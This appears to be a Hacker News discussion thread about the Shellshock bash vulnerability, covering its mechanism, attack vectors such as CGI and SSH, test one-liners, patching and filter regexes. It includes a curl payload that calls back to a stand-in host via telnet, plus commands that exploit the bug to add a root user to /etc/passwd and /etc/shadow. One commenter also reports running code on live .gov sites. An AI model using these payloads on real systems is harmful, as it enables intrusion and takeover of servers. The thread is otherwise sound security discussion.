/bin/sh depends on the system. It might be busybox or a minimal shell (this is common on embedded devices). On some systems like OSX and I think CentOS /bin/sh is just bash. You can check with `/bin/sh --version`.
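Following that advice, a quick Python sketch to see what /bin/sh really is (the resolved path is distro-dependent):

```python
import os

# /bin/sh is usually a symlink; resolve it to see the actual shell binary.
real = os.path.realpath("/bin/sh")
print("/bin/sh ->", real)  # e.g. dash on Debian/Ubuntu, bash on RHEL/CentOS
```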
That's true of any code execution vulnerability, though - it seems odd to call out the privilege elevation specifically. If that's all the GP meant, then sure, I fully grok.
I think it comes down to a jargon vs technical language thing. In formal settings arbitrary code execution is a different thing from privilege escalation. In casual jargony talk though, security guys tend to equate code execution with privilege escalation with box ownage.
Basically it goes "why would anyone not follow the execution -> escalation -> own path?" It's such an automatic assumption, combined with the basic premise of "there's no such thing as a secure computer", that the exact details are a hand-wave. This comes from the repeated demonstration that it's almost always true.
None of this seems crazy unlikely, but I'd still like to hear a confirmation that that's what was meant. Especially since korzun was talking specifically about Debian and Ubuntu where bash is only used as a login shell and so presumably those with access could already just run the app.
That recommends changing broken scripts to #!/bin/bash or changing to sh == bash as solutions. I would guess that there are going to be plenty of easily vulnerable debian/ubuntu systems.
More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating"; they are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.
'More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating"; they are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.'
It doesn't matter for security. It matters a lot for my understanding of what's going on.
Most code execution vulnerabilities aren't remotely accessible; this one is, which makes the privilege escalation particularly nasty (e.g. incorrectly assuming that since the www-data user doesn't have access to anything sensitive, this bug isn't a big deal).
Yes, potentially - if at any point during the execution of a program (or its descendents) a bash script gets called with an untrusted environment variable value from a remote source. The difference between a system with bash as /bin/sh and a system with dash as /bin/sh is that the bash system is implicitly executing bash all the time, whereas the dash system requires an explicitly-bash script to be executed. So the dash system has many fewer windows of opportunity for an exploit, but they could still be there.
Well, sure. It seems a slightly odd way to phrase it if that's the entirety of what korzun meant, though. Is there somewhere that happens in a typical out-of-the-box Debian or Ubuntu box?
Passing executable code in environment variables is an incredibly bad idea.
The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.
The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.
But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.
Basically this is a misfeature that must be rooted out, pardon the pun.
I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?
Edit: From my experiments, the name in (a) doesn't matter, and "echo" and "date" can be changed. The thing in echo's position is where the output goes (and can be an absolute path!), and "date" is a command that is run. Still no idea how it works, as I'm not very familiar with shell syntax and Googling symbols like "=>" is mostly useless. It may even be meaningless and is just garbage to get bash into a state that causes this to happen?
Edit 2: http://seclists.org/oss-sec/2014/q3/679 has a small example. "Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though"
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.
Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.
Have you ever looked at the backend web interface of some of the most popular residential wifi routers? It's shell script. Why? It's a cheap and accessible interpreted language; no need to clutter up your tiny embedded OS with the huge requirements of php, perl, etc when you have all the tools you need in busybox.
CGI apps execute shell scripts all the time. Even if an app executes an app executes an app executes an app, if that app four layers down runs a shell script, the environment is still passed down. Turtles, dude.
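That inheritance chain can be sketched in Python: a CGI gateway copies request headers into environment variables, and every child process down the stack inherits them unchanged. The header value here is the standard test payload; with a patched shell it is inert:

```python
import os
import subprocess

# What a CGI gateway does with an incoming request header:
env = dict(os.environ, HTTP_USER_AGENT="() { :;}; echo owned")

# Several layers down, some helper shells out. The environment rode along
# the whole way and is handed to the child shell untouched; if /bin/sh is
# a vulnerable bash, the header's payload runs during shell startup.
out = subprocess.run(["sh", "-c", "echo handling request"],
                     env=env, capture_output=True, text=True)
print(out.stdout.strip())
```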
It could be a simple one-line script that wraps the real command, setting memory limits and the like first. (I used a similar trick to prevent Skype using up all my memory in the past.)
Another attack surface is OpenSSH, through the use of AcceptEnv variables as well as TERM and SSH_ORIGINAL_COMMAND. An environment variable with an arbitrary name can carry a nefarious function, which can enable network exploitation.
On most systems I've found this works:
LC_TIME='() { :;}; echo vulnerable' ssh <hostname>
Not sure of the impact of this, as the user would need remote permissions anyway for the SSH login to occur. But if there were some form of restricted shell that then spawned bash, it might potentially create an attack vector.
I was wondering about this too. My thinking was, if a user's laptop is compromised (and has the exploit in LC_TIME, TERM or similar), and the user then SSH in to a server with exploitable bash, the nefarious command will presumably be executed without the user knowing. But of course, if the laptop is compromised that badly, it could probably wreak havoc to the server anyway.
As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
This vulnerability is the kind of reason I would have a stripped-down OpenSSH for public users, if I were them. Hard-code to do what they need, don't use configuration files, remove any features not needed. For example, to print the "You've successfully authenticated, but GitHub does not provide shell access." a user gets trying to ssh to github.com, don't invoke anything, print it directly from the SSH server.
Maybe. Actually, it looks like Github is using libssh, which is along the lines of what I was thinking, without having to mess with crypto too much, as you say.
I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.
There's no reason webservers have to use bash by default.
Sysadmins might need a hefty shell with lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.
I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.
No, it's not printed in your trivial example, but if you replace the simple "echo" command with any bash script, or any executable that calls a bash script, or any executable that invokes another program that calls a bash script, or ... then you're screwed.
Even with the "zsh", this should print "vulnerable":
You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:
Right, the point being that bash is vulnerable, not zsh (as was suggested by the post I was replying to). I'm not claiming that using zsh as your interactive shell somehow makes you immune.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
but failed to spot that the second command invokes bash not zsh.
My tests suggest that neither zsh 4.3.17 nor 5.0.6 (the versions that ship with Debian stable and testing respectively) is vulnerable to this exploit - if you replace bash with zsh in the test oneliner then the code after the end of the function definition in the environment variable is not executed.
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).
Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...
However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.
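For reference, the underlying feature is bash's function export. Post-Shellshock, upstream bash moved the mechanism to specially encoded names (BASH_FUNC_name%%), so arbitrary variables can no longer smuggle functions in. A Python sketch, assuming a hardened upstream bash; some distro patches used a different encoding, in which case the import simply fails:

```python
import os
import shutil
import subprocess

bash = shutil.which("bash")
env = dict(os.environ)
# The modern encoding for an exported function named 'greet':
env["BASH_FUNC_greet%%"] = "() { echo hello from the parent; }"

if bash:
    out = subprocess.run([bash, "-c", "greet"], env=env,
                         capture_output=True, text=True)
    # A hardened upstream bash imports the function and prints the greeting;
    # builds with a different encoding don't know 'greet' and exit non-zero.
    print(out.stdout.strip() or "function was not imported")
else:
    print("bash not installed")
```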
CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.
I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.
This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.
FastCGI accepts name/value pairs from the server and most default language bindings against it will turn them into environment variables for the benefit of code that expects to be able to reference them. This can get tricky if you do anything that spawns a process with your code later.
Almost all vendor-supplied web interfaces that don't come bundled with a web server are CGI so you can just run it from whatever web server you have. Even some very popular 'appliances' out there that have their own web server run CGI.
Unless you're using CGI, your system environment will not be contaminated. CGI is vulnerable because it relies on passing untrusted data in environment variables. No other gateway interface I'm familiar with does.
Are you certain that no method of invoking a dynamic script sets environment variables to values controlled by requests? If so, it sounds like even an innocent call to system("lame a.wav b.mp3") could lead to code execution.
Edit: also, you may be surprised to find that some "libraries" are actually wrappers around external binaries (e.g. libgpgme). If any of them used a system() or exec() call that preserves environment, and the binary or the library ever invokes bash (e.g. via system()), then trouble will ensue.
If you're using the nginx module, it gets the data from an instance of ngx_http_request_t. From there it gets passed around over sockets. Environment variables are not involved.
Using environment variables for request data would be quite insane when one of your marketing strategies is "fast" -- you'd either have to fork-per-connection just like CGI, or pre-fork processes that take input over a socket, deliberately deserialize it into the environment(!), and use getenv.
However overhyped Passenger might be, I don't know why you'd think the Phusion guys are that crazy.
Discovering that CUPS and dhclient may be vulnerable doesn't change anything. I'm talking about HTTP as an attack vector.
Yeah this is true - a lot of hosting providers run PHP as a CGI as it allows them to run the PHP process under the user account (although it is very slow, and RUID2 is a better solution).
If you're not running mod_cgi can this affect the system in any way?
They would be too slow to be useful at any kind of real load. Are you sure you're not thinking of FastCGI? That doesn't pass data through the environment, it goes over a socket.
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
It's been a bad time for FOSS/Linux systems: Heartbleed, the occasional priv escalation, apt-get, bash, etc. Or whatever the hell happened at TrueCrypt. Or the recent AOSP browser bug in Android that probably won't be patched by any OEM/carrier. These are all pretty serious issues. Not to mention the endless wave of malware targeting Windows systems, especially the evil CryptoLocker ransomware.
I really do think Heartbleed was a wake-up call for some people, and a lot of extra auditing is being done, perhaps with some healthy paranoia fueled by the recent NSA allegations. Software, in general, imo, is pretty insecure. The exploits, bugs, etc. are out there, and you'll find them if you look hard enough. And since software is always being updated, that also means new bugs and security issues.
As a sysadmin, I've just seen too often how the sausage is made. I have zero illusions about security. There are just too many avenues to compromise, be it via software or via plain-jane social engineering. I think one day in the future we (or our children) are going to look back at the age of viruses and buffer overflows and wonder how the hell we managed to get by, the same way I look at cars from the 50s-60s that suffered from things like vapor lock, were incredibly unsafe, and other issues that really don't exist today.
You're just paying attention. There have been some interesting ones in the last year or two, but this is really a trickle compared to the early through mid 2000s.
People started to pay attention. There's a bunch of new vulns being patched daily; if you follow CVEs or the oss-sec list you can see that.
What's "new" (it's been done for a few years now) is that there's more marketing drive behind them: fancy commercial names, dedicated websites, and issues that are often exaggerated.
Actually, super-critical vulns are still rare (like Heartbleed, Code Red, etc.).
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.
This thing seriously needs to be patched asap. Update your systems now.
This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.
I'm a bit confused about how to properly patch my mac.
Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?
I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.
You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.
The good news is that as long as you're not running a local server, the vulnerability is pretty limited particularly since even if you did have SSH enabled the exploit would require valid authentication first.
There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).
> Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.
I would go further and suggest that now is an excellent time to ask which of those services you really need to have at all. The default of blocking incoming connections is right for most people, even developers.
At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.
My findings so far: setting User-Agent to that new string and executing a .cgi script complains about: syntax error near unexpected token `newline' in `#!/bin/bash'. (My speculation is that we are in some kind of parsing context where no newlines are expected; none are given on the example bash -c ... line, but when you actually run a script there will be a newline).
I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.
I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.
Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.
I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.
So the question for me still seems to be: what is the weird context set up by that environment variable, and what else can you do with it other than redirect $1 to $0?
That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.
Can anyone explain what's going on there? It seems like defining a function within a nameless function; how does it end up with this redirect? I'm not sure what the exploitability of this is; is it just essentially $1 > $0?
The redirect at the end of the env var seems to be "remembered" even though the syntax error aborts the function definition, then the first arg is taken as the path to redirect to, and the following args as the command to execute. (I haven't dug into the actual parser, this is just my intuitive understanding.) It does seem to be about like $1 > $0, so not generally exploitable.
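The probe under discussion can be wrapped so it leaves no stray files. A Python sketch of the CVE-2014-7169 check (on a fully patched bash no file is created):

```python
import os
import shutil
import subprocess
import tempfile

bash = shutil.which("bash")
leaked = False
if bash:
    with tempfile.TemporaryDirectory() as d:
        # The env var value is: () { (a)=>\
        env = dict(os.environ, X="() { (a)=>\\")
        # On a vulnerable bash the dangling redirect is "remembered": the
        # first word of -c's argument (echo) becomes the output file and the
        # rest (date) the command, so a file named "echo" appears in cwd.
        subprocess.run([bash, "-c", "echo date"], env=env, cwd=d,
                       capture_output=True, text=True)
        leaked = os.path.exists(os.path.join(d, "echo"))

print("vulnerable to CVE-2014-7169" if leaked else "patched or bash absent")
```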
You may not use data derived from outside your program to affect something else outside your program--at least, not by accident. All command line arguments, environment variables, locale information (see perllocale), results of certain system calls (readdir(), readlink(), the variable of shmread(), the messages returned by msgrcv(), the password, gcos and shell fields returned by the getpwxxx() calls), and all file input are marked as "tainted".
Tainted data may not be used directly or indirectly in any command that invokes a sub-shell, nor in any command that modifies files, directories, or processes, with the following exceptions:
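A rough Python analogue of that taint discipline: allowlist-validate anything externally derived before it may reach a subshell. The pattern below is an invented, deliberately conservative example:

```python
import re

# Conservative allowlist with no shell metacharacters at all:
SAFE = re.compile(r"^[\w@%+=:,./-]*$")

def untaint(value):
    """Refuse values that could be meaningful to a shell."""
    if not SAFE.match(value):
        raise ValueError("tainted value: %r" % value)
    return value

print(untaint("report-2014.txt"))           # passes the allowlist
try:
    untaint("() { :;}; echo vulnerable")    # rejected: (, ), {, ; and space
except ValueError as err:
    print("blocked:", err)
```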
It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)
My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.
If you haven't already been using Homebrew, though, you will likely need to move /usr/local/bin in front of /usr/bin in your path; otherwise the old bash would still be used.
I think the default in bash should be to never execute the contents of environment variables (like the restricted shell mode allows). Does anyone know why it allows you to pass in shell functions this way? Does anything use it?
But I'm not sure how a scanner bot would find network accessible bashes to exploit. Seems like basically you need a cgi-bin with bash, and I don't think there's any way to predict a URL that is going to have such a thing.
Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.
You could search for *.cgi scripts indexed by Google. They may not be written IN Bash but maybe one of them opens up a shell to execute a command. Even if you are not explicitly passing any bad data to it, the environment will be passed and trigger this crazy vulnerability.
Gets me ~6k of hits that have just 'sh' in the URL (without the dot), and are not what we're looking for, mostly forum posts asking about how to make a bash cgi-bin. (Answer from the future: don't).
I _think_ putting quotes around the ".sh" is supposed to force the result to really have the period before the sh in the url.
It is far worse in the sense that it can lead to remote code execution. However, the number of vulnerable sites is far, far fewer. Like Heartbleed, this one will likely have a very long tail of systems remaining vulnerable. My guess is we will see this vulnerability used to compromise big targets in the next few months.
From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:
% E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
bash: warning: E: ignoring function definition attempt
bash: error importing function definition for `E'
--
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?
In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?
I got tired of the hype. How's the following code for a mitigation?
Basically, if some program does invoke /bin/bash, control first passes to this code which truncates suspicious environment variables. (and it dumps messages to the system log if/when it finds anything...)
The check should match for any variety of white space:
=(){
=() {
= ( ) {
etc... but feel free to update it for whatever other stupid things bash allows.
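The whitespace-tolerant check could be sketched like this in Python; the regex is an approximation of the variants listed above, and blanking (rather than deleting) the variable mirrors the truncation idea:

```python
import re

# Match '() {' with any amount of whitespace sprinkled in, per the list above.
SUSPICIOUS = re.compile(r"^\s*\(\s*\)\s*\{")

def scrub(environ):
    """Blank any value that looks like an exported-function definition."""
    return {k: ("" if SUSPICIOUS.match(v) else v) for k, v in environ.items()}

clean = scrub({
    "PATH": "/usr/bin",
    "badvar": "() { :;}; echo vulnerable",
    "sneaky": " ( ) { :;}; echo vulnerable",
})
print(sorted(k for k, v in clean.items() if v == ""))  # -> ['badvar', 'sneaky']
```

A real wrapper would then os.execve() the genuine bash binary with the scrubbed environment.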
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo
Looks like it works. I guess it is okay that after the close quote the command still runs even though it is not terminated
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
I'm by no means an expert, but am I completely wrong to think something like this should work to get a pingback from a vulnerable system that doesn't have curl installed?
curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://exploitablehost.com/blah.cgi
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.*?\)\s*\{.*?\}\s*;/ From testing it seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
I have qualms about Red Hat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.
Those regexes seem a bit too fragile for my liking. Adding an extra space between the paren and the bracket breaks it, naming the function breaks it, etc. Plus it has a bigger chance of triggering false positives. It's an okay emergency fix, but I'm positive one can do better.
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.
Also, don't use bash for running scripts. You never should anyway: in a sane environment /bin/sh is not bash. In Debian/Ubuntu it is dash, which is not vulnerable. Unfortunately the Red Hat-derived distros do use bash as the default /bin/sh. In the BSDs it is a standards-compliant POSIX sh too. bash is for users, not scripts.
First, it encourages people to use bash-specific stuff that is non-POSIX. Second, it is a huge, bloated piece of code that's fine as a user interface, but scripts should use something more minimal, to avoid this sort of issue.
/bin/sh is the shell called by system(3) and used by portable scripts bundled with packages. Those things can't use anything but standard sh anyway, so having them run bash is overkill. "Don't use bash as your /bin/sh" isn't the same as "don't use bash as your interactive shell" or "don't write bash scripts"
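Checking what /bin/sh actually is on a given box takes one line, since it is usually a symlink:

```shell
# See where /bin/sh points on this system.
ls -l /bin/sh
readlink -f /bin/sh   # e.g. dash on Debian/Ubuntu, bash on RHEL/CentOS
```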
> In the BSDs it is a standards compliant posix sh too.
In FreeBSD, /bin/sh is actually an Almquist-derived shell, not tcsh (tcsh is the default interactive csh). Bash likewise changes behaviour when invoked as sh[0]. It's POSIX compliant with extensions; all the shell's code is still there, it's just that some of it is switched off by default, or its behaviour modified, to be compliant.
I guess I'll answer one part: if you run $ env x='() { :;}; echo vulnerable' bash -c "echo test" in your terminal and it prints "vulnerable", you certainly appear to be vulnerable.
But I'm not knowledgeable about all the default scripts that launch things on the Mac. It's unclear to me whether any standard processes on OS X take advantage of bash.
By the time AcceptEnv has any effect, the user is already logged in and can run whatever they want anyway. If you're allowing untrusted users to authenticate to ssh, then, yeah, sure, but you'd be in a niche (and know it).
It can potentially be exploited via anything that shells out to bash with an environment that contains environment variables with values (that ultimately comes from) an untrusted source.
mod_cgi is just one of the most obvious attack vectors.
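The shelling-out path is worth making concrete: a system() or popen() call in any language runs `/bin/sh -c <cmd>`, and if that sh is bash, the inherited environment is parsed at startup. Forcing bash here to make the mechanism visible (the variable name is arbitrary):

```shell
# Stand-in for what system("echo doing the real work") does when /bin/sh
# is bash: the child shell inherits EVIL, and an unpatched bash would run
# the trailing "echo injected" during startup, before the real command.
env 'EVIL=() { :;}; echo injected' bash -c 'echo doing the real work'
```

On a patched bash only "doing the real work" is printed.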
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run the same firmware for years. The bigger routers get updates, yes, but the smaller ones and the modems don't.
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:
$ echo $BASH_VERSION
3.2.51(1)-release
$ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
$
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.
$ echo $BASH_VERSION
4.3.25(1)-release
$ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
$
Since other people are reporting that their copies of bash 3.2.51 are vulnerable, I suspect that the version of bash that is currently running in that terminal is 3.2.51 and vulnerable, but the version of bash that you are invoking from that vulnerable version of bash is not.
In other words, I suspect that:
$ echo $BASH_VERSION
and
$ bash --version
will report different version numbers.
If you start a new terminal and try `echo $BASH_VERSION`, you will probably see a different version as well.
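The two can be compared directly: $BASH_VERSION describes the shell currently interpreting your commands, while `bash --version` describes whatever binary $PATH resolves to, and those can be different files:

```shell
# Version of the shell running this snippet (empty if it isn't bash):
echo "current shell: ${BASH_VERSION:-not bash}"
# Version of the first `bash` found on $PATH, possibly a different binary:
bash --version | head -n1
command -v bash   # which file that actually is
```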
Yes - the shell currently running is probably the user's login shell, and the shell in e.g. /usr/local/bin/bash was probably installed by Homebrew or MacPorts.
That could be the reason. I renamed /bin/bash (version 3.2) to /bin/bash3 and copied the /usr/local/bin/bash that I built myself to /bin/bash, effectively making bash 4.3 the default login and system shell.
I started bash 3.2 from bash 4.3, so that could be the reason why it is not vulnerable as a child process.
env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"
env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"
No, all sorts of other network-facing systems can be vulnerable. Anything that ends up shelling out might pass some environment variables causing the problem. These things pop up in surprising places.
I have a feeling this is blown out of proportion.
Who's running bash setuid exactly? Right.
Who's running shell CGIs today? Right.
So... who has an example of common scripts that are executed remotely on most servers while accepting a remote environment? Until then, the panic seems unjustified...
Google brings up 410 .bash CGIs. Every one of them is almost guaranteed to be vulnerable at this point. Of the 1.2 million .sh CGIs, some are surely vulnerable. By this time, many of them are already in the process of being owned.
CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.
That's a really small number of servers, actually. I mean, people get owned every day, every minute.
There are a bunch of more easily exploitable local bugs that actually elevate your privileges.
This one bug DOES NOT elevate privileges. You need a service that passes unsanitized env vars (unchecked user input) to bash under a different user id than yours.
Even if the malicious code doesn't have superuser context, it can do damage to whatever context it is running under. If it's running as www-data, it can trash all your www-data-owned files. Or send your www-data-owned password files somewhere, etc. Unprivileged code can also attack other systems (firewalls permitting); you don't have to be root on system A to be part of a botnet which attacks system B. Denial-of-service havoc can be wreaked from a regular user context, too. Not to mention privacy violations. Pretty much all browser-related security and privacy issues are user space!
As I understand this, any CGI script could be affected, even one written in a different language, if it in turn does an os.system (or equivalent). More info here:
https://securityblog.redhat.com/2014/09/24/bash-specially-cr...
The permissions would only be as the web server user, but that allows all sorts of things to be run that are quite dangerous (resource exhaustion, attacking remote machines, downloading code and running it)
You would still need to be able to pass arbitrary data to the bash command, and if your php (or whatever) script does that, you have a lot of other potential problems to worry about.
Because of the way CGI works, you could just set a User-Agent or other HTTP header to contain an 'rm' or 'nc' command, or something to download and run an attack tool. E.g. you could run netcat to listen on a port, or connect out to an attacker's system to provide a connection into an otherwise firewalled database server.
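The CGI spec makes this concrete: the server exports each request header as an HTTP_* environment variable, so a hostile User-Agent lands verbatim in the environment of the CGI script and of anything it shells out to. Simulating the server side locally (the payload here is harmless):

```shell
# What the web server effectively does for a request carrying
# "User-Agent: () { :;}; echo pwned": export the header, run the handler.
# An unpatched bash runs the payload before the script body; a patched one
# just serves the request.
env 'HTTP_USER_AGENT=() { :;}; echo pwned' bash -c 'echo serving the request'
```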
Yes, you're right. We have Perl running on our server, and I just verified that it is vulnerable if any shell scripts are run from Perl. However, I quickly switched on mod_perl and verified that it is now not affected. (According to Red Hat, mod_perl and PHP are not affected, but it's good to verify.)
You can break the one-liner into two lines to see what is happening.
1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. bash: warning: badvar: ignoring function definition attempt
4. bash: error importing function definition for `badvar'
5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash spots the specially formed variable (named badvar), prints a warning,
4. ...and apparently doesn't define the function at all?
5. But other than that, the child bash runs as expected.
And now the same two input lines on an OLD bash:
1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. vulnerable
4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!
4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)
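For what it's worth, exported functions still work after the fixes; patched bash just moved them into specially encoded variable names (BASH_FUNC_name%% in current releases), which no ordinary environment variable can collide with, so a plain variable like badvar is never parsed as code. Assuming a reasonably current bash on PATH, you can see the encoding like this:

```shell
# Export a function and count how it shows up in a child's environment.
# Current bash stores it under an encoded name like BASH_FUNC_f%%.
bash -c 'f() { echo hi; }; export -f f; env | grep -c BASH_FUNC'
```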